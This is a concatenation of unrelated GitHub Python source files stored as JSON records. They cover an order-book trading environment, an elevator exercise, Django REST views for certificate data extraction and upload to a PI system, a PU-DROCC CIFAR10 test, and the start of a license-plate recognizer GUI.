np.array(_img)\n img = Image.fromarray(np.uint8(img * 255)).convert(\"L\")\n\n return np.array(img)\n else:\n return np.zeros([self.frame_width, self.frame_width * 2])\n\n def show_img(self, img):\n # img = np.array(Image.fromarray(np.uint8(np.array(img) * 255))\n # .convert(\"RGB\"))\n\n cv2.imshow(\"image\", img)\n cv2.waitKey(1)\n\n def step(self, action):\n done = self.done\n\n if self.macd_diff_enabled:\n if self.macd_diff > 0:\n action = 0\n\n self.step_position(action)\n\n self.reward += self.current_trade.reward\n\n self.step_count += 1\n\n if self.trial:\n self.trial.report(self.capital, self.step_count)\n\n observation = self.get_observation()\n\n if not done:\n done = self.done\n\n reward = self.reset_reward()\n\n # alog.info((reward, self.reward, self.current_trade.reward))\n\n self.print_summary()\n\n return (\n observation,\n reward,\n done,\n {\"capital\": self.capital, \"trades\": self.trades, \"action\": action},\n )\n\n\n@click.command()\n@click.option(\"--cache\", is_flag=True)\n@click.option(\"--database_name\", \"-d\", default=\"binance\", type=str)\n@click.option(\"--depth\", default=72, type=int)\n@click.option(\"--group-by\", \"-g\", default=\"30s\", type=str)\n@click.option(\"--interval\", \"-i\", default=\"10m\", type=str)\n@click.option(\"--leverage\", default=1.0, type=float)\n@click.option(\"--max-volume-quantile\", \"-m\", default=0.99, type=float)\n@click.option(\"--offset-interval\", \"-o\", default=\"0h\", type=str)\n@click.option(\"--round-decimals\", \"-D\", default=4, type=int)\n@click.option(\"--sequence-length\", \"-l\", default=48, type=int)\n@click.option(\"--summary-interval\", \"-s\", default=1, type=int)\n@click.option(\"--window-size\", \"-w\", default=\"2m\", type=str)\n@click.argument(\"symbol\", type=str)\ndef main(**kwargs):\n env = OrderBookFrameEnv(\n show_img=True,\n short_class_str=\"ShortRewardPnlDiffTrade\",\n flat_class_str=\"FlatRewardPnlDiffTrade\",\n random_frame_start=False,\n short_reward_enabled=True,\n is_training=False,\n max_short_position_length=0,\n min_change=-0.5,\n **kwargs\n )\n\n env.reset()\n\n 
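# smoke-test policy: sample action 0 with probability 0.9 and action 1 with probability 0.1\n    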
choice_args = dict(a=[0, 1], p=[0.9, 0.1])\n\n    _done = False\n    step = 0\n\n    while not _done:\n        state, reward, done, summary = env.step(np.random.choice(**choice_args))\n        step += 1\n        _done = done\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"joliveros/exchange-data","sub_path":"tgym/envs/orderbook/_orderbook_frame_env.py","file_name":"_orderbook_frame_env.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"35472159282","text":"people_count = int(input('Enter count of people: '))\n\ncounter = 1\npeople_weights = []\n\nwhile counter <= people_count:\n    people_kilograms = int(input('Enter kilograms for each person: '))\n    people_weights += [people_kilograms]\n\n    counter += 1\n\n\nfloors = int(input('Enter count of floors: '))\n\ncounter_2 = 1\nfloors_numbers = []\n\nwhile counter_2 <= floors:\n    number_of_floor = int(input('Enter number of floor: '))\n    floors_numbers += [number_of_floor]\n\n    counter_2 += 1\n\n\nprint('\\nThe kilograms of each person: ', people_weights)\nprint('\\nThe number of each floor: ', floors_numbers)\n\n\nmax_ppl = 2\nmax_kg = 250\nelevator_weight = []\ntrips = 0\n\nfor i in people_weights:\n    # dispatch the current car first if adding this person would exceed either limit\n    if elevator_weight and (sum(elevator_weight) + i > max_kg or len(elevator_weight) == max_ppl):\n        trips += 1\n        elevator_weight = []\n    elevator_weight += [i]\n\n# the last, partially filled car still has to make one trip\nif elevator_weight:\n    trips += 1\n\nprint('\\nThe count of trips is: ', trips)\n","repo_name":"KonstantinKocev/Programming0","sub_path":"Bonus_exs/Elevator_task.py","file_name":"Elevator_task.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41313927365","text":"\"\"\" \nApplication Module for Views.\nTODO: (Details)\n\"\"\"\n\n\n# Django Libraries\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.core.files.storage import FileSystemStorage\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.core.mail import send_mail\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view,authentication_classes,permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated,BasePermission\n#Developer Libraries\nfrom api.models import Certificate,ExtractedDataCSV,TagConfigurationTemplate,ManualLogTemplate,CoalParameters,CoalParametersSection,CoalParametersDividers,UserActivities\nfrom api.serializers import CertificateSerializer,UserActivitiesSerializer,TagConfigurationTemplateSerializer,ManualLogTemplateSerializer\nfrom api.libs.coal.controller.controller import Controller \nfrom api.libs.dga.dga_extractor import *\nfrom api.libs.pi.pi import *\nfrom api.libs.consts.activitylog_status import *\nfrom api.libs.tagconfiguration.tag_conf import preview_configuration,extract_param_tag_mapping,map_data_tagnames\nfrom .data_access_policy import PIDataAccessPolicy\nfrom .pagination import ModifiedPagination\n#Other Libraries\nimport pandas as pd\nimport os\nfrom datetime import datetime,timedelta\nfrom background_task import background\nfrom urllib.parse import urlparse\n\n#consts\nconsts_df = pd.read_csv(\"api\\\\libs\\\\coal\\\\data\\\\templates\\\\consts.csv\")\n\n#PERMISSIONS\nclass 
IsDataValidator(BasePermission):\n def has_permission(self, request, view):\n if request.user and request.user.groups.filter(name='data_validator'):\n return True\n return False\n\n#VIEWS\nclass CertificateViewSet(viewsets.ModelViewSet):\n \"\"\"API Class View for Certificates model.\n \n Attributes:\n permission_classes (Tuple): Tuple of Permission Classes.\n queryset (QuerySet): Queryset for all certificates\n serializer_class (Object): Type of Model Serializer.\n\n Methods:\n list(request)\n Returns an api response of the list of certificates.\n \"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = CertificateSerializer\n queryset = Certificate.objects.all()\n def list(self, request):\n \"\"\"Returns an api response of the list of certificates.\n \n Args:\n request (Request): A request instance\n\n Returns:\n Response: An API response of the list of certificates.\n \"\"\"\n queryset = Certificate.objects.all()\n serializer = CertificateSerializer(queryset, many=True)\n user = request.user\n return Response(serializer.data)\n\n def partial_update(self,request,*args, **kwargs):\n instance = self.queryset.get(pk=kwargs.get('pk'))\n serializer = self.serializer_class(instance, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n\nclass TagConfigurationTemplateViewSet(viewsets.ModelViewSet):\n \"\"\"API Class View for Certificates model.\n \n Attributes:\n permission_classes (Tuple): Tuple of Permission Classes.\n queryset (QuerySet): Queryset for all certificates\n serializer_class (Object): Type of Model Serializer.\n\n Methods:\n list(request)\n Returns an api response of the list of certificates.\n \"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = TagConfigurationTemplateSerializer\n queryset = TagConfigurationTemplate.objects.all()\n\n def get_permissions(self): \n self.permission_classes = [IsAuthenticated,IsDataValidator,]\n return super(TagConfigurationTemplateViewSet, self).get_permissions()\n\nclass ManualLogTemplateViewSet(viewsets.ModelViewSet):\n permission_classes = (IsAuthenticated,)\n serializer_class = ManualLogTemplateSerializer\n queryset = ManualLogTemplate.objects.all()\n\n # def get_permissions(self): \n # self.permission_classes = [IsAuthenticated,IsDataValidator,]\n # return super(TagConfigurationTemplateViewSet, self).get_permissions()\n\nclass UserActivitiesViewSet(viewsets.ModelViewSet):\n \"\"\"API Class View for UserActivities model.\n \n Attributes:\n pagination_class (Object): Type of Pagination Class\n permission_classes (Object): Type of Permission Class\n queryset (Queryset): Queryset on the list of certificates ordered by\n timestamp and excluding 'IN_PROGRESS' status\n serializer_class (Object): Type of Data Serializer Class\n \"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = UserActivitiesSerializer\n pagination_class = ModifiedPagination\n queryset = UserActivities.objects.all().order_by('-timestamp').exclude(status=\"P\")\n\n\n@api_view(['GET'])\n@permission_classes((IsAuthenticated,))\ndef get_home(request):\n return Response({\"message\": \"Welcome to C8-Cube API\"},status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef get_user_groups(request):\n groups = request.user.groups.all()\n groups = [group.name for group in groups]\n return 
Response(groups,status=status.HTTP_200_OK)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef extract_data(request):\n \"\"\"API Functional View on extracting data.\n \n Args:\n request (Request): A request instance\n \n Returns:\n Response: An API response describing the status message of extracting data.\n \"\"\"\n try:\n _id = request.query_params[\"_id\"]\n queryset = Certificate.objects.filter(id = _id)\n cert = queryset[0]\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n req_user = str(request.user)\n activity = \"Extract Data from Certificate with id {}\".format(_id)\n log_user_activity(req_user,activity,IN_PROGRESS)\n extract_data_background(_id,req_user,activity)\n return Response({\"message\" : \"Data Queued for Extraction\",\"results\" : []},status=status.HTTP_200_OK)\n except Exception as e:\n print(e)\n return Response({\"error\" : str(e)},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef view_data(request):\n \"\"\"API Functional View on viewing extracted data.\n \n Args:\n request (Request): A request instance\n \n Returns:\n Response: An API response returning the results of data extration.\n \"\"\"\n try:\n _id = request.query_params[\"_id\"]\n queryset = Certificate.objects.filter(id = _id)\n cert = queryset[0]\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n results = check_extracted_data(_id).to_dict(orient=\"records\")\n return Response({\"message\" : \"Data Extracted\",\"results\" : results,\"cert\":{\"id\":cert.id,'name':cert.name,'tag_configuration_id':cert.tag_configuration_id}},status=status.HTTP_200_OK)\n except Exception as e:\n print(e)\n return Response({\"error\" : str(e)},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef view_pdf(request):\n \"\"\"API Functional View on viewing uploaded pdf file.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n HttpResponse: application/pdf response of the specified certificate.\n \"\"\"\n try:\n fs = FileSystemStorage()\n _id = request.query_params[\"_id\"]\n cert = Certificate.objects.get(id=_id)\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n if fs.exists(cert_path):\n with fs.open(cert_path) as pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n return response\n else:\n return HttpResponseNotFound('The requested pdf was not found in our server.')\n except Exception as e:\n return HttpResponseNotFound('The requested pdf was not found in our server.')\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef save_edited_data(request):\n \"\"\"API Functional View on saving edits from extracted data.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n Response: An API response returning the status on saving edits from extracted data.\n \"\"\"\n print(\"Saving edited data\")\n try:\n _id = request.query_params[\"_id\"]\n activity = \"Edit Data from Certificate with id {}\".format(_id)\n req_user = str(request.user)\n data_to_save = request.data\n data_df = pd.DataFrame.from_records(data_to_save)\n extracted_data_csv = ExtractedDataCSV.objects.get(id = _id)\n data_df.to_csv(extracted_data_csv.filepath, index=False)\n log_user_activity(req_user,activity,COMPLETED)\n return Response({\"message\" : \"Edited Data 
Saved\"},status=status.HTTP_200_OK)\n except Exception as e:\n log_user_activity(req_user,activity,FAILED)\n return Response({\"message\" : \"Saving Failed\"},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef test_pi_connection(request):\n \"\"\"API Functional View on testing PI connection.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n Response: An API response returning the status on testing PI Connection.\n \"\"\"\n print(\"Testing PI connection\")\n try:\n host = request.data.get(\"host\")\n response = get_pi_connection(request)\n if response.status_code == status.HTTP_200_OK:\n dataservers_url = \"{}/dataservers\".format(host)\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n dataservers = get_pi_dataservers(dataservers_url,username,password)\n return Response({\"message\" : \"Connection to {} successful \".format(host),\"dataservers\": dataservers},status=status.HTTP_200_OK)\n else:\n return Response({\"error\": PI_CONNECTION_ERROR.format(host)},status=response.status_code)\n except Exception as e:\n print(e)\n return Response({\"message\" : \"Saving Failed\"},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef upload_certificate_data(request):\n \"\"\"API Functional View on uploading extracted data to PI.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n Response: An API response returning the status on uploading extracted data to PI.\n \"\"\"\n\n #Request \n _id = request.query_params[\"_id\"]\n activity = \"Upload Data from Certificate with id {}\".format(_id)\n req_user = str(request.user)\n try:\n #Preprocesses df\n metadata = request.data[\"metadata\"]\n data_to_save = request.data[\"piData\"]\n data_df = pd.DataFrame.from_records(data_to_save)\n data_df = data_df.dropna()\n data_df['Timestamp'] = pd.to_datetime(data_df['Timestamp']) \n data_df['Timestamp'] = data_df['Timestamp'].apply(lambda x : (x + timedelta(hours=8)).strftime(\"%Y-%m-%d %H:%M:%S.%f\"))\n #Get Tag Configuration\n extracted_data_csv = ExtractedDataCSV.objects.get(id = _id)\n certificate = Certificate.objects.get(id = _id)\n try:\n tag_conf = TagConfigurationTemplate.objects.get(id=certificate.tag_configuration_id)\n reference_path = os.path.join(settings.MEDIA_ROOT,str(tag_conf.reference))\n reference_df = pd.read_csv(reference_path)\n tag_mapping = extract_param_tag_mapping(data_df,reference_df,tag_conf.transformation)\n except Exception as e:\n print(e)\n reference_df = None\n DEFAULT_QUERY = \"Select Parameter,Parameter as Tagname from pi_data\"\n tag_mapping = extract_param_tag_mapping(data_df,reference_df,DEFAULT_QUERY)\n\n #Transform data for upload\n data_df['Uploaded'] = data_df.apply(\n lambda row : upload_to_pi_solo(metadata,{\n \"Parameter\":row[\"Parameter\"],\n \"Timestamp\":row[\"Timestamp\"],\n \"Value\":row[\"Value\"]}\n ) if row[\"Validated\"] else False,\n axis=1\n )\n\n count_uploaded_data = (data_df[\"Uploaded\"]).sum()\n #Save state and log activity\n data_df.to_csv(extracted_data_csv.filepath, index=False)\n log_user_activity(req_user,activity,COMPLETED)\n return Response({\"message\" : \"Certificate Data Upload Task completed. 
{} rows uploaded\".format(count_uploaded_data)},status=status.HTTP_200_OK)\n    except Exception as e:\n        log_user_activity(req_user,activity,FAILED)\n        return Response({\"message\" : \"Uploading Failed\"},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\ndef upload_manual_data(request):\n    try:\n        #Preprocesses df\n        metadata = request.data[\"metadata\"]\n        data_to_save = request.data[\"piData\"]\n        data_df = pd.DataFrame.from_records(data_to_save)\n        data_df = data_df.dropna()\n        data_df['Timestamp'] = pd.to_datetime(data_df['Timestamp']) \n        data_df['Timestamp'] = data_df['Timestamp'].apply(lambda x : (x + timedelta(hours=8)).strftime(\"%Y-%m-%d %H:%M:%S.%f\"))\n\n        #TODO Tag Configuration\n\n        #Transform data for upload\n        data_df['Uploaded'] = data_df.apply(\n            lambda row : upload_to_pi_solo(metadata,{\n                \"Parameter\":row[\"Parameter\"],\n                \"Timestamp\":row[\"Timestamp\"],\n                \"Value\":row[\"Value\"]}\n            ) if row[\"Validated\"] else False,\n            axis=1\n        )\n        count_uploaded_data = (data_df[\"Uploaded\"]).sum()\n        return Response({\"message\" : \"Manual Logs Upload Task completed. {} rows uploaded\".format(count_uploaded_data)},status=status.HTTP_200_OK) \n    except Exception as e:\n        print(e)\n        return Response({\"message\" : \"Uploading Failed\"},status=status.HTTP_400_BAD_REQUEST) \n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef preview_configuration_api(request):\n    try:\n        _id = request.query_params[\"_id\"]\n        activity = \"Test Configuration with certificate with id: {}\".format(_id)\n        req_user = str(request.user)\n        reference = request.data.get('reference')\n\n        #@print(type(reference)==InMemoryUploadedFile)\n        if reference:\n            if type(reference) == str:\n                reference = os.path.join(settings.BASE_DIR,urlparse(reference).path.replace(\"/\",\"\",1))\n                print(reference)\n            reference = pd.read_csv(reference)\n\n        pi_data = check_extracted_data(_id)\n        transformation = request.data.get('transformation')\n        preview = preview_configuration(pi_data,reference,transformation).to_dict(orient=\"records\")\n        #print(pd.read_csv(request.data.get('reference')))\n        return Response({\"message\" : \"Sample tag/parameter map retrieved.\",\"preview\" : preview},status=status.HTTP_200_OK)\n    except Exception as e:\n        print(e)\n        return Response({\"message\": \"Configuration Failed\"},status=status.HTTP_400_BAD_REQUEST) \n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef extract_manual_log_template(request):\n    try:\n        _id = request.query_params[\"_id\"]\n        manuallogtemplate = ManualLogTemplate.objects.get(id=_id)\n        template = pd.read_csv(manuallogtemplate.template).to_dict(orient=\"records\")\n        print(template)\n        return Response({\"message\" : \"Manual Log Template retrieved.\",\"template\" : template},status=status.HTTP_200_OK)\n    except Exception as e:\n        print(e)\n        return Response({\"message\" : \"Manual Log Template retrieval failed.\"},status=status.HTTP_400_BAD_REQUEST)\n\n#HELPER FUNCTIONS\n@background(schedule=timezone.now())\ndef extract_data_background(_id,req_user,activity):\n    \"\"\"Runs a queued background extraction for a specific uploaded file.\n    \n    Args:\n        _id (int): Certificate/Document ID\n        req_user (str): User requesting the extraction.\n        activity (str): Description of the activity.\n    \"\"\"\n    cert = Certificate.objects.get(id = _id)\n    if cert.cert_type == 'COAL': \n        extract_coal_properties(_id,req_user,activity)\n    elif cert.cert_type == 'DGA':\n        extract_dga_params(_id,req_user,activity)\n\ndef extract_dga_params(_id,req_user,activity):\n    \"\"\"Performs Data Extraction on DGA Certificates.\n    \n    Args:\n        _id (int): Certificate/Document ID\n        
req_user (str): User requesting the extraction.\n activity (str): Description of the activity.\n \"\"\"\n cert = Certificate.objects.get(id = _id)\n cert.extraction_status = \"Q\"\n cert.save()\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n dfs = tabula.read_pdf(cert_path, pages='all')\n print(\"Extracting data from {}\".format(cert_path))\n print(\"Start Time : {}\".format(datetime.now()))\n concat = []\n for df in dfs:\n test_name = get_test_name(df.columns)\n print(test_name)\n df.columns = df.iloc[0]\n try:\n df = df[1:]\n df[\"Parameter\"] = df[get_parameters(df.columns)].apply(lambda x: \".\".join([test_name,filter_out_uom(str(x))]))\n #df[\"Parameter\"] = df[get_parameters(df.columns)].apply(lambda x: test_name if not x else filter_out_uom(str(x)))\n df[\"Timestamp\"] = datetime.now()\n df[\"Description\"] = None \n df[\"Validated\"] = True\n df[\"Uploaded\"] = False\n df['Value'] = df[get_values(df.columns)].apply(lambda x: extract_numbers_or_str(str(x)))\n df = df[~df[\"Parameter\"].str.contains(\"Equipment\") == True]\n concat.append(df)\n except Exception as e:\n pass\n #raise(e)\n final_results = pd.concat(concat, axis=0)\n final_results = final_results[[\"Parameter\",\"Description\",\"Timestamp\",\"Value\",\"Validated\",'Uploaded']]\n #final_results.columns = [\"Parameter\",\"Description\",\"Timestamp\",\"Value\",\"Validated\",'Uploaded']\n #Save file\n cert_name = cert.name\n cert_type = cert.cert_type\n #return Response({\"message\" : \"Data Extracted\",\"results\" : results},status=status.HTTP_200_OK)\n _dir,filename = os.path.split(cert.upload.path)\n extracted_csv_file_path = \"media\\\\extracted_data\\\\{}.csv\".format(filename.replace(\"PDF\",\"pdf\").replace(\"pdf\",\"csv\"))\n save_extracted_data(_id,cert_name,cert_type,extracted_csv_file_path,final_results)\n cert.extraction_status = \"E\"\n cert.save() \n log_user_activity(req_user,activity,COMPLETED)\n print(\"End Time : {}\".format(datetime.now()))\n\ndef extract_coal_properties(_id,req_user,activity):\n \"\"\"Performs Data Extraction on Coal Test/Analysis Certificates\n \n Args:\n _id (int): Certificate/Document ID\n req_user (str): User requesting the extraction.\n activity (str): Description of the activity.\n \"\"\"\n queryset = Certificate.objects.filter(id = _id)\n cert = queryset[0]\n cert.extraction_status = \"Q\"\n cert.save()\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n print(\"Extracting data from {}\".format(cert_path))\n print(\"Start Time : {}\".format(datetime.now()))\n params_df = pd.DataFrame.from_records(CoalParameters.objects.all().values('section','parameters'))\n sections_df = pd.DataFrame.from_records(CoalParametersSection.objects.all().values('sections'))\n dividers_df = pd.DataFrame.from_records(CoalParametersDividers.objects.all().values('dividers'))\n\n min_df = consts_df[consts_df[\"text\"]==\"min\"]\n max_df = consts_df[consts_df[\"text\"]==\"max\"]\n cosa_3_const_df = consts_df[consts_df[\"text\"]==\"cosa-3\"]\n cosa_4_1_const_df = consts_df[consts_df[\"text\"]==\"cosa-4.1\"]\n args = {\n \"min_df\" : min_df,\n \"max_df\" : max_df,\n \"cosa_3_const_df\" : cosa_3_const_df,\n \"cosa_4_1_const_df\" : cosa_4_1_const_df,\n \"parameters\" : params_df,\n \"sections\" : sections_df,\n \"dividers\" : dividers_df,\n }\n controller = Controller(args=args)\n try:\n results = controller.process_pdf(cert_path)\n results_df = pd.DataFrame(results)\n results_df[\"Uploaded\"] = False\n results_df = 
results_df[[\"Parameter\",\"Description\",\"Timestamp\",\"Value\",\"Validated\",'Uploaded']]\n        #Save file\n        cert_name = cert.name\n        cert_type = cert.cert_type\n        _dir,filename = os.path.split(cert.upload.path)\n        extracted_csv_file_path = \"media\\\\extracted_data\\\\{}.csv\".format(filename.replace(\"PDF\",\"pdf\").replace(\"pdf\",\"csv\"))\n        save_extracted_data(_id,cert_name,cert_type,extracted_csv_file_path,results_df)\n        cert.extraction_status = \"E\"\n        cert.save()\n        log_user_activity(req_user,activity,COMPLETED)\n    except Exception as e:\n        print(e)\n        cert.extraction_status = \"X\"\n        cert.save()\n        log_user_activity(req_user,activity,FAILED)\n    finally:\n        print(\"End Time : {}\".format(datetime.now()))\n\ndef check_extracted_data(_id):\n    \"\"\"Returns the extracted data for a specific document, or False if none exists.\n    \n    Args:\n        _id (int): Certificate/Document ID\n    \n    Returns:\n        DataFrame/bool: DataFrame of extracted data, or False.\n    \"\"\"\n    queryset = ExtractedDataCSV.objects.filter(id = _id)\n    has_data = queryset.exists()\n    if has_data:\n        filepath = queryset[0].filepath\n        extracted_data_df = pd.read_csv(filepath)\n        extracted_data_df = extracted_data_df.where(extracted_data_df.notnull(), None)\n        return extracted_data_df\n    return has_data\n\ndef save_extracted_data(_id,name,cert_type,filepath,results_df):\n    \"\"\"Saves extracted data to a columnar file (.csv)\n    \n    Args:\n        _id (int): Certificate/Document ID\n        name (str): Document name\n        cert_type (str): Document/Certificate Type\n        filepath (str): Document path\n        results_df (DataFrame): Dataframe representation of extracted data.\n    \"\"\"\n    print(results_df)\n    print(\"Saving extracted data\")\n    results_df.to_csv(filepath, index=False)\n    extracted_data_csv = ExtractedDataCSV(id=_id,name=name,cert_type=cert_type,filepath=filepath)\n    extracted_data_csv.save()\n\ndef log_user_activity(user,activity,status):\n    \"\"\"Logs user activities\n    \n    Args:\n        user (str): Request User\n        activity (str): Activity Description\n        status (str): Activity Status\n    \n    Returns:\n        int: UserActivity ID\n    \"\"\"\n    timestamp = datetime.now()\n    user_activity = UserActivities(user=user,activity=activity,timestamp=timestamp,status=status)\n    user_activity.save()\n    return user_activity.id\n","repo_name":"c8AwesomeDevs/jimahcertsapi","sub_path":"api/views_old.py","file_name":"views_old.py","file_ext":"py","file_size_in_byte":23041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20227036356","text":"from imports import *\nfrom models.drocc import PU_DROCC, DROCC\n\n\ndef test_onevsall(alpha=0.5,\n                  n = 10,\n                  pos_labels=[0],\n                  params=None,\n                  name='blank'):\n    results = {}\n\n    models = ['DROCC', 'PU_DROCC']\n    for model_type in models:\n        results[model_type] = []\n\n    train_holder = get_data('CIFAR10',\n                            True,\n                            pos_label=None,\n                            neg_label=None,\n                            norm_flag=False)\n\n    test_holder = get_data('CIFAR10',\n                           False,\n                           pos_label=None,\n                           neg_label=None,\n                           norm_flag=False)\n\n    for pos_label in tqdm(pos_labels):\n\n        train_bin = train_holder.pos_neg_split([pos_label])\n        # split the held-out test data from test_holder (not train_holder)\n        test_bin = test_holder.pos_neg_split([pos_label])\n\n\n\n        res = {}\n        for model_type in models:\n            res[model_type] = []\n\n        for i in tqdm(range(n)):\n            train_data, pi = train_bin.get_dataset(alpha, svm_labels=False)\n            test_data, pi_test = test_bin.get_dataset(alpha, c=0, svm_labels=False)\n\n            test_loader = torch.utils.data.DataLoader(test_data,\n                                                      batch_size=512,\n                                                      shuffle=True)\n\n            drocc = DROCC().to(device)\n            drocc.run_train(train_data.lab_data(lab=1), None, 
**params[pos_label]['DROCC'])\n res['DROCC'].append(drocc.test(test_loader))\n\n pu_drocc = PU_DROCC().to(device)\n pu_drocc.run_train(train_data, None, **params[pos_label]['PU_DROCC'])\n res['PU_DROCC'].append(pu_drocc.test(test_loader))\n\n for model in res:\n results[model].append(res[model])\n\n # with open(f'/content/gdrive/My Drive/results/{name}.pcl', 'wb') as f:\n # pickle.dump(results, f)\n\n return results\n","repo_name":"jbr-ai-labs/PU-OC","sub_path":"test/DROCC/one-vs-all.py","file_name":"one-vs-all.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"3177679076","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nfrom PySide import *\nfrom plate_recog import *\n\n# Main window\nclass RecognizerWindow(QtGui.QWidget):\n\tCOL_QTY = 6\n\tLIN_QTY = 8\n\n\tdef __init__(self):\n\t\tsuper(RecognizerWindow, self).__init__()\n\t\tself.neuralNet = NeuralNet()\n\t\tself.setLayout(self.buildMainScreen())\n\t\tself.trained = False\n\t\tself.answers = {\n\t\t\t\t\t\"000000\" : \"0\" , \n\t\t\t\t\t\"000001\" : \"1\" , \n\t\t\t\t\t\"000010\" : \"2\" , \n\t\t\t\t\t\"000011\" : \"3\" , \n\t\t\t\t\t\"000100\" : \"4\" , \n\t\t\t\t\t\"000101\" : \"5\" , \n\t\t\t\t\t\"000110\" : \"6\" , \n\t\t\t\t\t\"000111\" : \"7\" , \n\t\t\t\t\t\"001000\" : \"8\" , \n\t\t\t\t\t\"001001\" : \"9\" , \n\t\t\t\t\t\"001010\" : \"A\" , \n\t\t\t\t\t\"001011\" : \"B\" , \n\t\t\t\t\t\"001100\" : \"C\" , \n\t\t\t\t\t\"001101\" : \"D\" , \n\t\t\t\t\t\"001110\" : \"E\" , \n\t\t\t\t\t\"001111\" : \"F\" , \n\t\t\t\t\t\"010000\" : \"G\" , \n\t\t\t\t\t\"010001\" : \"H\" , \n\t\t\t\t\t\"010010\" : \"I\" , \n\t\t\t\t\t\"010011\" : \"J\" ,\n\t\t\t\t\t\"010100\" : \"K\" , \n\t\t\t\t\t\"010101\" : \"L\" , \n\t\t\t\t\t\"010110\" : \"M\" , \n\t\t\t\t\t\"010111\" : \"N\" , \n\t\t\t\t\t\"011000\" : \"O\" , \n\t\t\t\t\t\"011001\" : \"P\" , \n\t\t\t\t\t\"011010\" : \"Q\" , \n\t\t\t\t\t\"011011\" : \"R\" , \n\t\t\t\t\t\"011100\" : \"S\" , \n\t\t\t\t\t\"011101\" : \"T\" , \n\t\t\t\t\t\"011110\" : \"U\" , \n\t\t\t\t\t\"011111\" : \"V\" , \n\t\t\t\t\t\"100000\" : \"W\" , \n\t\t\t\t\t\"100001\" : \"X\" , \n\t\t\t\t\t\"100010\" : \"Y\" , \n\t\t\t\t\t\"100011\" : \"Z\" }\n\n\tdef buildTrainScreen(self):\n\t\ttrainScreen = QtGui.QGroupBox(self.trUtf8(\"Treinamento\"))\n\t\tlayout = QtGui.QVBoxLayout()\n\n\t\tform = QtGui.QWidget()\n\t\tformLayout = QtGui.QFormLayout()\n\n\t\tfileInput = QtGui.QWidget()\n\t\tfileInputLayout = QtGui.QHBoxLayout()\n\t\tself.txtFilePath = QtGui.QLineEdit()\n\t\tself.btnSelectFile = QtGui.QPushButton(self.trUtf8(\"Arquivo...\"))\n\t\tself.btnSelectFile.clicked.connect(self.selectFilePatt)\n\t\tfileInputLayout.addWidget(self.txtFilePath)\n\t\tfileInputLayout.addWidget(self.btnSelectFile)\n\t\tfileInput.setLayout(fileInputLayout)\n\t\tformLayout.addRow(self.trUtf8(\"Arquivo de padrões: \"), fileInput)\n\n\t\tself.txtNumNeurons = QtGui.QSpinBox()\n\t\tself.txtNumNeurons.setValue(20)\n\t\tformLayout.addRow(self.trUtf8(\"Nº neurônios camada intermediária: \"), self.txtNumNeurons)\n\n\t\tself.txtLearningRate = QtGui.QDoubleSpinBox()\n\t\tself.txtLearningRate.setValue(0.5)\n\t\tself.txtLearningRate.setRange(0.0, 1.0)\n\t\tformLayout.addRow(self.trUtf8(\"Taxa de aprendizagem: \"), self.txtLearningRate)\n\n\t\tself.txtNumIterations = QtGui.QSpinBox()\n\t\tself.txtNumIterations.setRange(10,100000)\n\t\tself.txtNumIterations.setValue(500)\n\t\tformLayout.addRow(self.trUtf8(\"Número de iterações: \"), 
